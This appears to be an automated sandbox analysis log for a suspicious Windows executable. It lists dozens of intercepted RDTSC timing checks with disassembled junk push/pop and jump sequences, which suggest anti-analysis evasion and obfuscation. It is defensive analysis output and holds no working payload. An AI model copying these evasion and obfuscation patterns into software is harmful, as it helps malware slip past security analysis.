              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DD9 second address: 6C3DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DDF second address: 6C3DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A909BC1Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DEF second address: 6C3DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3EC5 second address: 6C3EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC4E second address: 66DC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC52 second address: 66DC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC5C second address: 66DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CBDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC6D second address: 66DC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC71 second address: 66DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC79 second address: 66DC7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC7E second address: 66DC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C249 second address: 66C24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C24F second address: 66C259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF8A95A6CB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C259 second address: 66C25D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C25D second address: 66C268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDB1A second address: 6CDB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D31E7 second address: 6D31EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D32A6 second address: 6D32AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D8299 second address: 6D82A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6FD3 second address: 6D6FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF8A909BC16h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f popad 0x00000010 jg 00007FF8A909BC41h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D6FED second address: 6D6FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7504 second address: 6D752F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC21h 0x00000009 pushad 0x0000000a jmp 00007FF8A909BC1Eh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D769B second address: 6D76A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7B14 second address: 6D7B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF8A909BC29h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D7F4B second address: 6D7F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007FF8A95A6CB8h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D80A0 second address: 6D80C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF8A909BC16h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e jmp 00007FF8A909BC1Fh 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D80C8 second address: 6D80CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1C6 second address: 6DE1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FF8A909BC16h 0x0000000d jne 00007FF8A909BC16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1D9 second address: 6DE1DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1DD second address: 6DE1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF8A909BC16h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1F0 second address: 6DE1FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DE1FA second address: 6DE1FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E33E9 second address: 6E3400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3400 second address: 6E3424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FF8A909BC2Ch 0x0000000e jmp 00007FF8A909BC26h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3424 second address: 6E344D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FF8A95A6CB6h 0x00000009 jmp 00007FF8A95A6CBAh 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FF8A95A6CC2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A625C second address: 6A6262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6262 second address: 6A6266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6266 second address: 68CEEE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8A909BC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jnc 00007FF8A909BC1Ch 0x00000015 call dword ptr [ebp+122D2B84h] 0x0000001b jmp 00007FF8A909BC20h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FF8A909BC20h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a jg 00007FF8A909BC16h 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A634D second address: 6A6352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6768 second address: 6A676C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A681E second address: 6A6822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6822 second address: 6A686F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF8A909BC29h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF8A909BC24h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A686F second address: 6A6879 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6879 second address: 6A687F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A687F second address: 6A6883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6883 second address: 6A68C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FF8A909BC24h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FF8A909BC26h 0x0000001a jl 00007FF8A909BC16h 0x00000020 popad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A68C7 second address: 6A68DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FF8A95A6CB6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6A82 second address: 6A6ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FF8A909BC24h 0x00000010 xchg eax, esi 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FF8A909BC18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D31ABh], ecx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jns 00007FF8A909BC1Ch 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6ADB second address: 6A6AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A95A6CC6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6CF5 second address: 6A6D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF8A909BC24h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF8A909BC18h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ecx, 6F0EAAD1h 0x0000002c push 00000004h 0x0000002e mov ch, D5h 0x00000030 movzx ecx, dx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push ebx 0x00000038 pop ebx 0x00000039 jne 00007FF8A909BC16h 0x0000003f popad 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D4B second address: 6A6D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF8A95A6CB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D55 second address: 6A6D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D59 second address: 6A6D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jns 00007FF8A95A6CB6h 0x00000012 jmp 00007FF8A95A6CC5h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D81 second address: 6A6D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D87 second address: 6A6D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A70AB second address: 6A70D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FF8A909BC1Ch 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF8A909BC1Bh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7220 second address: 6A7243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7466 second address: 6A749B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b jmp 00007FF8A909BC20h 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FF8A909BC1Eh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A749B second address: 6A749F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A749F second address: 6A74A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3753 second address: 6E3758 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3758 second address: 6E3765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007FF8A909BC1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3A22 second address: 6E3A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3A26 second address: 6E3A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3B80 second address: 6E3B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3B86 second address: 6E3B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8A909BC1Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9090 second address: 6E9094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9094 second address: 6E90AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8A909BC21h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E90AB second address: 6E90B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E90B1 second address: 6E90B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9683 second address: 6E9699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9699 second address: 6E969D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E969D second address: 6E96B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jo 00007FF8A95A6CF0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FF8A95A6CB6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E96B2 second address: 6E96B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9819 second address: 6E981F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E981F second address: 6E982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FF8A909BC1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E982F second address: 6E9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9837 second address: 6E983B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E983B second address: 6E9851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF8A95A6CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 js 00007FF8A95A6CB6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE473 second address: 6EE47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE47A second address: 6EE480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE480 second address: 6EE486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE486 second address: 6EE49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF8A95A6CB8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE5C7 second address: 6EE5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE710 second address: 6EE762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC9h 0x00000009 pop esi 0x0000000a jmp 00007FF8A95A6CC3h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FF8A95A6CBCh 0x00000018 jbe 00007FF8A95A6CB6h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF8A95A6CC0h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE762 second address: 6EE76E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FF8A909BC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEA27 second address: 6EEA3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF8A95A6CBEh 0x0000000c jnc 00007FF8A95A6CB6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEA3F second address: 6EEA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB98 second address: 6EEBAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8A95A6CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF8A95A6CB6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EECCF second address: 6EECD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EECD3 second address: 6EECD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EECD7 second address: 6EECE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEE21 second address: 6EEE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEE25 second address: 6EEE29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEFBB second address: 6EEFC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EF3F2 second address: 6EF405 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF8A909BC1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
